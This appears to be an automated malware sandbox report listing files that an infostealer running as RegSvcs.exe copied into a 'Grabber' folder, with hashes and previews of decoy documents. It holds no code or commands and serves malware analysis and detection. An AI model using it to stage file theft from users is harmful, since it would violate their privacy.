Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.69486718145169
Encrypted:	false
SSDEEP:	24:XvKYeI9D5UOyoiaxIKgpZ9ONvMyTONN5ZjJH1U:yyD6yxILZ9OtTT+XRG
MD5:	E63B196AE0D5F7670244FB1347D75EFC
SHA1:	1C17108AC7E5263674836BAD67AE44D8C3C6890B
SHA-256:	D8C0D7B9CDFC72CAAB0A7687299B6734708E98C6DD088CDB0FF1A659E294B49D
SHA-512:	63345352964E1BD19AC843F82820E9B29C5BA991A002AB9B3164E1AA10B6D88BFA0DFAFA2E91E584835BA89B6A1770140AC14EA0B4B64E6C3BF8CDA34C9698AC
Malicious:	false
Preview:	LIJDSFKJZGBDGXNCCVBULCELYCDFJRIXKMFPVDHHKPYEYOXKFYMNEETRQHXLDRVBOTNERMYOYUJOPHUSKFPWBGKNJYBGZTTHNKGNUZWATSMORYBOIKBFSVUUMZNDYXOYKYUKGRNFVRQOPBEEIPDGTPBXCNLKHMGPHFCEQOUTEDGJZTMFUUGECZETRSODGZCJVQEAMRZADPDVQRANZOSHTGPOXPXGXXQDJVYZOCNXDECWJISPPIJOZUBSSKPGODUHTISNESPZRLELINJJYOXSBFTVUDENIBRDIMMGFIQNDGUSXDBHQNJRYLFTZGOCELKZGOQQKNDPFAMTXHBKHJYXYEGLJLANRMMTCVEFYRTWLXIMCCHDWVOLGVUWRNLSIBMLMBKVSYLKXRTMZROHVHCRDBCODTPNVQMBPRJGBGOOFVGDIERMXUFETJQWDXSQQFMQAZGGRVNRCUOAVYJDIMQETJOANIIDEGJCHEFRSNVBQAQBBUTTMXBTJXRHLSOCTPPBIKPXITOOCINTVZYAVQLVOOZWSOPLYJPOTKFKIKEHIDDPCDDEPKVDYQAVTVBFYYWCGUKGIDVLQSIPXISDEDNJWONTSILFUGUYMKQLKEJGOOCBYSXDFHNFHHWGLXWWQKSSOHSSTZLRZVRHZVBZGGEZQFSIWQQPMILSPBAMPAGAHHVJJCITDTJRZTRBEXSXOVDKONGLMSWBAOOYAFISJHKEYUKIWXBFUDUMVQRELEPVTNQBALAQOEAEFVPIKNYIPNICGKQFRVXNQUEFULLOYWMHOMUFEMHYNKNWMAOBGWSECZOKWISDOIKSUVWBGWPNAMFUHBRWEJQPHFPEKIRLAEPTBNRQEUVXXIZSSOOEFEETUMNPSVEAKOXVYHAOIXBEYBVXDJXZCNDVOPZLARFFUSXUOWXQBKDLINBWBQLXLHHNIXZEPCNHFEIZUZSTXWFUITSBKYSELMNKNBBDQMNLAIOSKYHCWGFPNUXAFSRHOWYH

C:\Users\user\AppData\Local\50258fbd039b7763b78e3cbf6b4d4ee3\user@928100_en-CH\Grabber\DRIVE-C\Users\user\Downloads\LIJDSFKJZG.xlsx

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.69486718145169
Encrypted:	false
SSDEEP:	24:XvKYeI9D5UOyoiaxIKgpZ9ONvMyTONN5ZjJH1U:yyD6yxILZ9OtTT+XRG
MD5:	E63B196AE0D5F7670244FB1347D75EFC
SHA1:	1C17108AC7E5263674836BAD67AE44D8C3C6890B
SHA-256:	D8C0D7B9CDFC72CAAB0A7687299B6734708E98C6DD088CDB0FF1A659E294B49D
SHA-512:	63345352964E1BD19AC843F82820E9B29C5BA991A002AB9B3164E1AA10B6D88BFA0DFAFA2E91E584835BA89B6A1770140AC14EA0B4B64E6C3BF8CDA34C9698AC
Malicious:	false
Preview:	LIJDSFKJZGBDGXNCCVBULCELYCDFJRIXKMFPVDHHKPYEYOXKFYMNEETRQHXLDRVBOTNERMYOYUJOPHUSKFPWBGKNJYBGZTTHNKGNUZWATSMORYBOIKBFSVUUMZNDYXOYKYUKGRNFVRQOPBEEIPDGTPBXCNLKHMGPHFCEQOUTEDGJZTMFUUGECZETRSODGZCJVQEAMRZADPDVQRANZOSHTGPOXPXGXXQDJVYZOCNXDECWJISPPIJOZUBSSKPGODUHTISNESPZRLELINJJYOXSBFTVUDENIBRDIMMGFIQNDGUSXDBHQNJRYLFTZGOCELKZGOQQKNDPFAMTXHBKHJYXYEGLJLANRMMTCVEFYRTWLXIMCCHDWVOLGVUWRNLSIBMLMBKVSYLKXRTMZROHVHCRDBCODTPNVQMBPRJGBGOOFVGDIERMXUFETJQWDXSQQFMQAZGGRVNRCUOAVYJDIMQETJOANIIDEGJCHEFRSNVBQAQBBUTTMXBTJXRHLSOCTPPBIKPXITOOCINTVZYAVQLVOOZWSOPLYJPOTKFKIKEHIDDPCDDEPKVDYQAVTVBFYYWCGUKGIDVLQSIPXISDEDNJWONTSILFUGUYMKQLKEJGOOCBYSXDFHNFHHWGLXWWQKSSOHSSTZLRZVRHZVBZGGEZQFSIWQQPMILSPBAMPAGAHHVJJCITDTJRZTRBEXSXOVDKONGLMSWBAOOYAFISJHKEYUKIWXBFUDUMVQRELEPVTNQBALAQOEAEFVPIKNYIPNICGKQFRVXNQUEFULLOYWMHOMUFEMHYNKNWMAOBGWSECZOKWISDOIKSUVWBGWPNAMFUHBRWEJQPHFPEKIRLAEPTBNRQEUVXXIZSSOOEFEETUMNPSVEAKOXVYHAOIXBEYBVXDJXZCNDVOPZLARFFUSXUOWXQBKDLINBWBQLXLHHNIXZEPCNHFEIZUZSTXWFUITSBKYSELMNKNBBDQMNLAIOSKYHCWGFPNUXAFSRHOWYH

C:\Users\user\AppData\Local\50258fbd039b7763b78e3cbf6b4d4ee3\user@928100_en-CH\Grabber\DRIVE-C\Users\user\Downloads\NIRMEKAMZH.png

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.694574194309462
Encrypted:	false
SSDEEP:	24:57msLju1di6quBsK4eI3+RkAjyMKtB/kS0G1:gmjuC1uBsNeAokAUB/GE
MD5:	78801AF1375CDD81ED0CC275FE562870
SHA1:	8ED80B60849A4665F11E20DE225B9ACB1F88D5A9
SHA-256:	44BF2D71E854D09660542648F4B41BC00C70ABA36B4C8FD76F9A8D8AB23B5276
SHA-512:	E20D16EC40FEF1A83DB1FC39A84B691870C30590FC70CA38CC83A8F08C08F626E3136ADBF3B731F85E5768561C8829C42DF3B97C726191FEF3859272A03E99E0
Malicious:	false
Preview:	NIRMEKAMZHIQPCHHYDLDLONNDCJFTRECXCDYNWSMACINEWVUDRAWELIDKGUGOSLGTIKNJSPGIFRTNFPWDBIHISPKHOBWBMPRCMOQQAVOUVQODKWHOMRFLDKYATGCKZVKRHTCMHJJGYWRTELTQOLJXKPKLCWLNKOQBPNOJHARBPHMNOZRAICCUCIEHOFBKAUBHQNVPQAWMIZZGYXPDVFFYAGVHCILYWHPIYXMHCXNZJBHOBSYJEJJTXWKIBAQBZGNDHAWRNDJBFGUEFMOHHHXTBQHMIBGPLFFGAEFCSIDIGIIDPUHNETSAWPCSJJCDZPMLCWGKVYJOMJWFUXHEQSIPJDTRUPSCBCTYFLTMLRFJUXIBNGXSREQTWHFPIDSKBRTLLRUTFDXFIDFUXMZCFABRMLSHWFSZTZUJRPKXKHBWYAPJLBFVPDCCGSQYVSJDWWNYUXGFFAMCEWZRCITRTQVISLFKGNMRYVUJTQWJUFSLPGOANDHPJXZJWSWQJJZLPACFDBTCFPQMXOVHIOAMCIQCTLIBSRXETYYSVLPHVURWFAJBQPHFKWZOFSUIKXWOHPOJGFCCQGRXFMTCKHSWJPWBLFTLVERFEAFHASTRMUQSDEUNXGDSWWTOQTUBAZVNLXDRFCZWKUVIGVXHTLERNSTFJCPGLHSIFYNUWMACSMFBHFDCZSOPZRKQGTETMPYNUQPOTCKDJQXQUUMEWVKVIEYDAEXLRTMQQSTAVCIBCOSHDMRFFHIAQDBBMBEOMTPGHKJIAYMKMTMXYUVORUJUGSHEHFCYZUALULRJGKXINMJWUWMPZOJOUMUEFFWCKOWNLIEVQWZPJMTQVIEDAFICXPPSUGBPZSMHDQOIXNDWLCSVZUHTSHAPPFDAEETYFLSNJFPXRPZYQLZLSJQALWIOEGAOFDHHNAOIWCTFHXKZJROQRTVBGVHJKRUCGBHKRLCZODATMBGLOISTFOETTXPJOPGPPJYNFXWQFALNGZLGZVJ

C:\Users\user\AppData\Local\50258fbd039b7763b78e3cbf6b4d4ee3\user@928100_en-CH\Grabber\DRIVE-C\Users\user\Downloads\QFAPOWPAFG.pdf

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.690474000177721
Encrypted:	false
SSDEEP:	24:2OgtZqoLtXCKESzKP+tziBUswJwLVk9zxY/tks7VMejXhggCon:cLtXZEmKPopswJEqxUkp82an
MD5:	A01E6B89B2F69F2DA25CB28751A6261C
SHA1:	48C11C0BECEB053F3DB16EC43135B20360E77E9B
SHA-256:	0D0EB85E2964B5DDA19C78D11B536C72544AE51B09DBEC26E70C69ADDC7E9AA5
SHA-512:	1E335E567B7F959E7524E532E257FBC0A21818BDCE0B909F83CBBCE8013FA61A8D665D7DED0982F87B29A5A786A0EE7129792A1B2D48DD205180569D9E919059
Malicious:	false
Preview:	QFAPOWPAFGZUMXROWPODMNAMXJGGULHBVFMBDFCUTBDPEHPYKVYAURAEPYZMHPBECXOGPOKPNMKAIBYHBFNFVWPHHZFRFVAYYHSJZJTHAYESIKJCXVOVANTTAMQKCXEHJRYFSWGEELTALODIPFLWFILANHAGQENMCPNFLPAJIPRNZRAIETALHZECBIKVUBLJMHNYJXPSAMZZCVZQOHLATXYVRZQROYHFKLVOJLGRAGXLMXJHKHSSCTHDFNSLOUEZPTFGVVVGCDIXIBWQFIIFACZAYUUQZJRKZXJQPLVPFTJAMSPRDIBBPPFLUCOUPPQDSFKQXMEIFUXXAGKAWLWJPNBHZSGIAFFXPBLRMFNGMVBEWTTPFJEHMXLOZWQHEHGWBXCAMZISSZMPHUOREQDUTUEPDVLBWTFCJIFAGQOEHFIMLTDTDLYPEQZDZBBZYMKXTUKVCEROFCABVNAQXVLLCCNLEOGKLFPVSGMNNQZHFNCWNPGBCLLMTYKZMJSUDIPHSUQJQTOTICLSMQNHYJAQTVXMEZAEGNBGADHUJNJLQZSSGWRLYBWJEOTERXWRTICIVUFNKHRUSWRGABWPZDFTGSDASOKXSFUGVBUISDQNJUAOCSOANZFXTFQGDKEKGZJRMJMGTAJCTJEOCZCUZMUYKAKZZQYDRJXWZWMOXQQLWJMWAENIFMHJXMELOZTVHRLQZNWCBXKEBNUBDDOFYHNWIPPRWGDZCQLMHAOLYZIDJJXAASOVDNHNMDDCIWFPIOLQHWQCPUVUZUDVOKBMFLALCZEQWJAKTVUUDROHEKJKHQBLQZNVWSNNZFKMZLQPFYUYHNCDTCBVUUNKNZIORBFTFVKLHZTQAPWVKTTZFCTHJBBWQMZTFKADJIZZANUOLLRBSVTUCNIJWDQPYHEPWEUTFVNOACOFURIPTLDGJUOYFJRHAUIQREUKUSADZYOEDEDZRKKPKLFLFQIMMIKLOCTSOFOEZYVAGMCITCUWAOUT

C:\Users\user\AppData\Local\50258fbd039b7763b78e3cbf6b4d4ee3\user@928100_en-CH\Grabber\DRIVE-C\Users\user\Downloads\QFAPOWPAFG.xlsx

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.690474000177721
Encrypted:	false
SSDEEP:	24:2OgtZqoLtXCKESzKP+tziBUswJwLVk9zxY/tks7VMejXhggCon:cLtXZEmKPopswJEqxUkp82an
MD5:	A01E6B89B2F69F2DA25CB28751A6261C
SHA1:	48C11C0BECEB053F3DB16EC43135B20360E77E9B
SHA-256:	0D0EB85E2964B5DDA19C78D11B536C72544AE51B09DBEC26E70C69ADDC7E9AA5
SHA-512:	1E335E567B7F959E7524E532E257FBC0A21818BDCE0B909F83CBBCE8013FA61A8D665D7DED0982F87B29A5A786A0EE7129792A1B2D48DD205180569D9E919059
Malicious:	false
Preview:	QFAPOWPAFGZUMXROWPODMNAMXJGGULHBVFMBDFCUTBDPEHPYKVYAURAEPYZMHPBECXOGPOKPNMKAIBYHBFNFVWPHHZFRFVAYYHSJZJTHAYESIKJCXVOVANTTAMQKCXEHJRYFSWGEELTALODIPFLWFILANHAGQENMCPNFLPAJIPRNZRAIETALHZECBIKVUBLJMHNYJXPSAMZZCVZQOHLATXYVRZQROYHFKLVOJLGRAGXLMXJHKHSSCTHDFNSLOUEZPTFGVVVGCDIXIBWQFIIFACZAYUUQZJRKZXJQPLVPFTJAMSPRDIBBPPFLUCOUPPQDSFKQXMEIFUXXAGKAWLWJPNBHZSGIAFFXPBLRMFNGMVBEWTTPFJEHMXLOZWQHEHGWBXCAMZISSZMPHUOREQDUTUEPDVLBWTFCJIFAGQOEHFIMLTDTDLYPEQZDZBBZYMKXTUKVCEROFCABVNAQXVLLCCNLEOGKLFPVSGMNNQZHFNCWNPGBCLLMTYKZMJSUDIPHSUQJQTOTICLSMQNHYJAQTVXMEZAEGNBGADHUJNJLQZSSGWRLYBWJEOTERXWRTICIVUFNKHRUSWRGABWPZDFTGSDASOKXSFUGVBUISDQNJUAOCSOANZFXTFQGDKEKGZJRMJMGTAJCTJEOCZCUZMUYKAKZZQYDRJXWZWMOXQQLWJMWAENIFMHJXMELOZTVHRLQZNWCBXKEBNUBDDOFYHNWIPPRWGDZCQLMHAOLYZIDJJXAASOVDNHNMDDCIWFPIOLQHWQCPUVUZUDVOKBMFLALCZEQWJAKTVUUDROHEKJKHQBLQZNVWSNNZFKMZLQPFYUYHNCDTCBVUUNKNZIORBFTFVKLHZTQAPWVKTTZFCTHJBBWQMZTFKADJIZZANUOLLRBSVTUCNIJWDQPYHEPWEUTFVNOACOFURIPTLDGJUOYFJRHAUIQREUKUSADZYOEDEDZRKKPKLFLFQIMMIKLOCTSOFOEZYVAGMCITCUWAOUT

C:\Users\user\AppData\Local\50258fbd039b7763b78e3cbf6b4d4ee3\user@928100_en-CH\Grabber\DRIVE-C\Users\user\Downloads\SNIPGPPREP.png

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.701796197804446
Encrypted:	false
SSDEEP:	24:C1U2g6pCwYBq9+pGzEcrz023TZ9iFxwELi:2U2gCCm9drz0wTZsIEe
MD5:	C8350CE91F4E8E8B04269B5F3C6148DA
SHA1:	22D523A327EBAF8616488087E2DCE9DBD857F0CC
SHA-256:	1BE0B3682C4F3A3315465E66A2C7C357BB06225947C526B1B89A39D9D120AFBF
SHA-512:	C4891D35B6E895E4A9F4A785701EFFA4305AE88D09D309865F9312D95C296CB417916D8CBA461099E80F68C5AE5015A1172E60319256A453DE81445660F55806
Malicious:	false
Preview:	SNIPGPPREPVDSXKMBCQXEQRWSYOYKDGHPXSNVTYLWVPMUIXPKXDRFHMINIQBFZTPTVMTSZAWIXFLHCKJNAWKCQYMBHUKFDOIJBXXLUNVNMKEDOTTPPDLIAGSTXKJKMHVVGIGUNGKPTPDUEUVMGZRIBRMBHLZOZZIBTDOCDOASXCIFRVGCSENFOEARIYUEACCMVFPUDRRUHYQQFJBAWDGKHRWDHTGYUXKSSVSTFCVQOQGTKOBOMZZTKVYFLAXTKJMTUDSETBGCOOKYGPLGPNAFICZERONWJHOMIWLGEWSSANDAVRYRUWZSRNZFYKTMSQXLZZGTQKXVQLDKQIHEDADRTKYMYNBVWROSFBYUXYULCESFAKNPBXYOELAWZCZFAPVQWMMNLBQRIPMVDMMWGXGKDJNUJGGGBNSGWEDDLRHGAAWJCYOEMVEHAYXYEHSKMWJPPHERNLXAGENBCUAZODRTUDIOUWNPZSHJGYOVHWQKWRAGGUMLCITTLAJXOXDUPFFLAHWLWPRQRAXSKOBHTXQNNGYHHVLBOEFTHAXTLKUGTNIYSDATIJHBUFTSGQHRXQQGXCBWVJIULNMYSMFYMPXRZOWMHYMZOLIBIYHPQRQJTZOMJZHKRTSWQQVINGIZHWDLNCJKAMKHSMFOTUPQMESXHXMJSAXESVNVSKORQSXVCYCKNZKOFZFUKINTRLLEGXVQTQURFVKWLFRQZVQVBVOEMATWFLXFDJVWCYMPYCSJCUUGUCIPOPIVLEFNZCPNYAWTXOATSTYLECDEFJNQFYGVPQWTJBNAVWKGALRTACLENBODJOQDXMPOYCYEFXOOOOMCQXLRGDBUUVJNQAEBZDSPDLPFIEOXRWSFCHXDUSBTSLEDLCZPOHIMIMQZMHHTMDFUUMKUAMBYNWWRQKDEXPPDWGKCNTWTFNHBMNDQIMVNFYWGALYORHHPUAXLDHMTGOKMMTAOCOVLGFIHZLZFADWMNNCWOLNJDSGFCWVDBYK

C:\Users\user\AppData\Local\50258fbd039b7763b78e3cbf6b4d4ee3\user@928100_en-CH\Grabber\DRIVE-C\Users\user\Downloads\UNKRLCVOHV.docx

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.698999446679606
Encrypted:	false
SSDEEP:	24:W9l1TKf/7G6pHxojyPqnhSz0hujim56BAhI8QR9QlFpd:6l1uFqyP5zY5moAoah
MD5:	73351F70BFEF33BEEA9E1CC192801D02
SHA1:	ACFD9C2DFA1B38FAB53EEB4730B0DF0551B45D8C
SHA-256:	F6917A805A90AC72064D294E5E0FBA4604588F7B0EB2B3A3511D1FC6887E3E24
SHA-512:	56D46FF29F86F3B314EBC6CC456A1D153D0F1245A926F82AE7FA9A6A5AD792094FEDBB5FC489929186C8A72732BE4EAFF3BCF2E508B8B2FC50B013E6166B212C
Malicious:	false
Preview:	UNKRLCVOHVAXPHOHAZYDIMBTYYPLYBYVUEQLGGJJCFCITCEMGOMMPTCXLGLYUZHZWMTUNUOFUUYAUDMSGBWJKAMIFUAYTDIKVYQPGYQSIZTANWSUNZDHBRNONSOUWVUJZFBPOZIMZOUPVAYJKSJULUHYRYUUOLYWEWFCYAZHMJKHXUZLTHEXFDNRXIUQOZHGGMDFHSXAJKHPBRPJJKVVXGMDIMEMMFXEOBQJSMYSSMPVSVUNJLJSSMEFHHLFEVPWZDDEIKQGOJPOJWTWMNPIEQXWXOBLNLDRNRUGDUXCMTURFAWMSSYAENGRWRBIJOYJNUMDYXNDETRQMYAMGJYZKZQPFPCONTLPPRLYMQJPIWCAXNOLGZOTNQEWQGBVSNORDVIXIUJAENWBXHSXSDNAMBAXUDBRCRHHYFJQLZEAGFZJUFMBIUBABNXVYITYPKRJUMGDPPABWBKNLHDKPLRUIRQXXKLFZAHHOQZHNTUNORTHIPKRZRDGRVPKIZRHYAGOVNDISDQRFXONCHILLZJTGXRZPEIPHKZXDBODDSUZIKNUVTNMZGVZQILJHRYJYZKDBLCLJFWSXRREYFFMEXBICHNCCTBTTTTZZVMSHPBKJMXPXFJNIDQFSJDMCXXUZPFVBFVKYCVFVQFUVOJWWIUNBICQVZGOZZVDJKKZTGDLWXADCBHYGUDWYWTYVYOOICLDGZXJHSTPFGQBMRCCCBJSXCPVVBKRNYTLTAOWPNJFKXUXQORRVHCHMSRAHQHFDEMZUFOFJOQFXHQBLWKNHXKEBLUJMQCFCSTBVXKUUPPXZNEWBUZPPVJFCDLXJEGEZSQSHHBNUCTRMEDMGPNZBHGEXVTWWZFELEFQQWXGHSVDMBAGZANSOHWAGHWRFCVNRSBOOZFJQONOYPNXBMHJINMGSGLMUSTAOMZXKOIHFYYSJWELBRBKMJUVQKVVFUFLDZKJVPCATVIHCISAYNPTMBEUQYJRYFUSBKOSITLVDUTJ

C:\Users\user\AppData\Local\50258fbd039b7763b78e3cbf6b4d4ee3\user@928100_en-CH\Grabber\DRIVE-C\Users\user\Downloads\UNKRLCVOHV.xlsx

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.698999446679606
Encrypted:	false
SSDEEP:	24:W9l1TKf/7G6pHxojyPqnhSz0hujim56BAhI8QR9QlFpd:6l1uFqyP5zY5moAoah
MD5:	73351F70BFEF33BEEA9E1CC192801D02
SHA1:	ACFD9C2DFA1B38FAB53EEB4730B0DF0551B45D8C
SHA-256:	F6917A805A90AC72064D294E5E0FBA4604588F7B0EB2B3A3511D1FC6887E3E24
SHA-512:	56D46FF29F86F3B314EBC6CC456A1D153D0F1245A926F82AE7FA9A6A5AD792094FEDBB5FC489929186C8A72732BE4EAFF3BCF2E508B8B2FC50B013E6166B212C
Malicious:	false
Preview:	UNKRLCVOHVAXPHOHAZYDIMBTYYPLYBYVUEQLGGJJCFCITCEMGOMMPTCXLGLYUZHZWMTUNUOFUUYAUDMSGBWJKAMIFUAYTDIKVYQPGYQSIZTANWSUNZDHBRNONSOUWVUJZFBPOZIMZOUPVAYJKSJULUHYRYUUOLYWEWFCYAZHMJKHXUZLTHEXFDNRXIUQOZHGGMDFHSXAJKHPBRPJJKVVXGMDIMEMMFXEOBQJSMYSSMPVSVUNJLJSSMEFHHLFEVPWZDDEIKQGOJPOJWTWMNPIEQXWXOBLNLDRNRUGDUXCMTURFAWMSSYAENGRWRBIJOYJNUMDYXNDETRQMYAMGJYZKZQPFPCONTLPPRLYMQJPIWCAXNOLGZOTNQEWQGBVSNORDVIXIUJAENWBXHSXSDNAMBAXUDBRCRHHYFJQLZEAGFZJUFMBIUBABNXVYITYPKRJUMGDPPABWBKNLHDKPLRUIRQXXKLFZAHHOQZHNTUNORTHIPKRZRDGRVPKIZRHYAGOVNDISDQRFXONCHILLZJTGXRZPEIPHKZXDBODDSUZIKNUVTNMZGVZQILJHRYJYZKDBLCLJFWSXRREYFFMEXBICHNCCTBTTTTZZVMSHPBKJMXPXFJNIDQFSJDMCXXUZPFVBFVKYCVFVQFUVOJWWIUNBICQVZGOZZVDJKKZTGDLWXADCBHYGUDWYWTYVYOOICLDGZXJHSTPFGQBMRCCCBJSXCPVVBKRNYTLTAOWPNJFKXUXQORRVHCHMSRAHQHFDEMZUFOFJOQFXHQBLWKNHXKEBLUJMQCFCSTBVXKUUPPXZNEWBUZPPVJFCDLXJEGEZSQSHHBNUCTRMEDMGPNZBHGEXVTWWZFELEFQQWXGHSVDMBAGZANSOHWAGHWRFCVNRSBOOZFJQONOYPNXBMHJINMGSGLMUSTAOMZXKOIHFYYSJWELBRBKMJUVQKVVFUFLDZKJVPCATVIHCISAYNPTMBEUQYJRYFUSBKOSITLVDUTJ

C:\Users\user\AppData\Local\50258fbd039b7763b78e3cbf6b4d4ee3\user@928100_en-CH\Grabber\DRIVE-C\Users\user\Downloads\WSHEJMDVQC.jpg

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.694142261581685
Encrypted:	false
SSDEEP:	24:f9GDi2EYjkpBrLp83PYbuFr5oKIQppDgX+qrctnWyd3z+g8BHGZ:yEYjkpZYwS/oKIuA+qriTjEBHe
MD5:	E9AA17F314E072EBB015265FB63E77C0
SHA1:	1233B76350B8181FFFC438B62002C02B4AE79000
SHA-256:	F66078FCFEC2D71549136CC8B5B4EE7D33C4994E0A4E3E7C11F5ADCD819D0436
SHA-512:	719E659924CE585E4DD8CEA9BC6B5371AD810999022F874F380F50C7153D3AE97CC934E3173EF06573CAEE6CBC835A668C4D7DC2ADE597B1B0D200FCBAC67DA1
Malicious:	false
Preview:	WSHEJMDVQCWJPIIWMEHEPOBRYLOZOHFMDEEYYASRZPHJZGFNCKWIQSPBUMWBCKDMTEBFINALYAFGJUQXINNGDKSDBFBQLHYZRLLDJYSVNXVIEPIYHZGOTARYUNPFNZVRVVWIOWWFIFWCHVVHXNGKFNRNLVVSOPOMGZCDQUWJFARKTCAVVDPTCPNIDLRGSLNKZTVRAJAILYGDVIAAGIVKXRCRTRZJPKATKZAWRJTPVLTDNBDIRDWCCHBTEVEGYPYDTGSMLUDQXMQCAVHLYMRKPCVHQHMGNCGBZKOUKCCBHQPSIYIJGDVOYJJJRQLDKNVUEXDKCTANSMCHJUBIODALXWUAFPSECIRPCAEPPBACCLXBZAEDKJHLGOICLSKBQEGFCVDQOFKKAJPCTRIXBNPUDXKHSSXTDTQZSFEWHTHKFNJWHOEXGCYSYWIHFSMYJIYEESDQFMESLFQFBUJNXHWFNXIDWEUDMVGFDXPTRRRNPARVUGZAYZRHNTXHZAPBLWMHFSSHMXCYMAGONQNLTCAVPZPCAKJRMGEPDIFETDNSXWPDVMAZGTTCLNRREMVTBLOGKASYOATUDXLJKIYPPDNLZIZMWWFFDVMUFCTZZOFJORNAMGQBAFGCPTDCZBKTIGYDSCSPMIEXAMGICZNTFVNRPLGPMBXJHNCQSYNMGGPKIQJNDBDUBVIVXFILKXZXHODXZAYIDEIMZZMKQNQNBCCMZNFBKSYULDGKOMQZDUQMUVTBBTUTRZMIOZGDEUPHCDKJQDSGBXYNWPWTHYVLGGYNOBJJKAZSTKJSBCHVCLGWYHCNILYSCYCHTGYOGMNGWDZAVDCOVKWJPWVNTTKFTSHAAXLYUEWEVGETFCFTLKWTQCVAMBWYOYJVXNPSSWXJXUZDXJOZNTBLIZLLJQXYNILILMHHONBPAPFMVWEMHIHAGMOXTIBNNEBGCVSZEZTMJVDXSVACSKTAVTFOOSEHZQGTOUSCIQBVIWZGABQNZGJE

C:\Users\user\AppData\Local\50258fbd039b7763b78e3cbf6b4d4ee3\user@928100_en-CH\Grabber\DRIVE-C\Users\user\Downloads\desktop.ini

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	282
Entropy (8bit):	3.5191090305155277
Encrypted:	false
SSDEEP:	6:QyqRsioTA5wmHOlRaQmZWGokJqAMhAlt4DAlLwkAl2FlRaQmZWGokJISlVl9:QZsiL5wmHOlDmo0qmt4clLwr2FlDmo0d
MD5:	3A37312509712D4E12D27240137FF377
SHA1:	30CED927E23B584725CF16351394175A6D2A9577
SHA-256:	B029393EA7B7CF644FB1C9F984F57C1980077562EE2E15D0FFD049C4C48098D3
SHA-512:	DBB9ABE70F8A781D141A71651A62A3A743C71A75A8305E9D23AF92F7307FB639DC4A85499115885E2A781B040CBB7613F582544C2D6DE521E588531E9C294B05
Malicious:	false
Preview:	......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.9.8.....I.c.o.n.R.e.s.o.u.r.c.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.i.m.a.g.e.r.e.s...d.l.l.,.-.1.8.4.....

C:\Users\user\AppData\Local\50258fbd039b7763b78e3cbf6b4d4ee3\user@928100_en-CH\Grabber\DRIVE-C\Users\user\Pictures\Camera Roll\desktop.ini

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	190
Entropy (8bit):	3.5497401529130053
Encrypted:	false
SSDEEP:	3:QJ8ql62fEilSl7lA5wXdUSlAOlRXKQlcl5lWGlyHk15ltB+SliLlyQOnJpJSl6nM:QyqRsioTA5wmHOlRaQmZWGokJD+SkLOy
MD5:	D48FCE44E0F298E5DB52FD5894502727
SHA1:	FCE1E65756138A3CA4EAAF8F7642867205B44897
SHA-256:	231A08CABA1F9BA9F14BD3E46834288F3C351079FCEDDA15E391B724AC0C7EA8
SHA-512:	A1C0378DB4E6DAC9A8638586F6797BAD877769D76334B976779CD90324029D755FB466260EF27BD1E7F9FDF97696CD8CD1318377970A1B5BF340EFB12A4FEB4A
Malicious:	false
Preview:	......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.w.i.n.d.o.w.s...s.t.o.r.a.g.e...d.l.l.,.-.2.1.8.2.4.....

C:\Users\user\AppData\Local\50258fbd039b7763b78e3cbf6b4d4ee3\user@928100_en-CH\Grabber\DRIVE-C\Users\user\Pictures\Saved Pictures\desktop.ini

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	190
Entropy (8bit):	3.5497401529130053
Encrypted:	false
SSDEEP:	3:QJ8ql62fEilSl7lA5wXdUSlAOlRXKQlcl5lWGlyHk15ltB+SliLlyQOnJpJSl3sY:QyqRsioTA5wmHOlRaQmZWGokJD+SkLOO
MD5:	87A524A2F34307C674DBA10708585A5E
SHA1:	E0508C3F1496073B9F6F9ECB2FB01CB91F9E8201
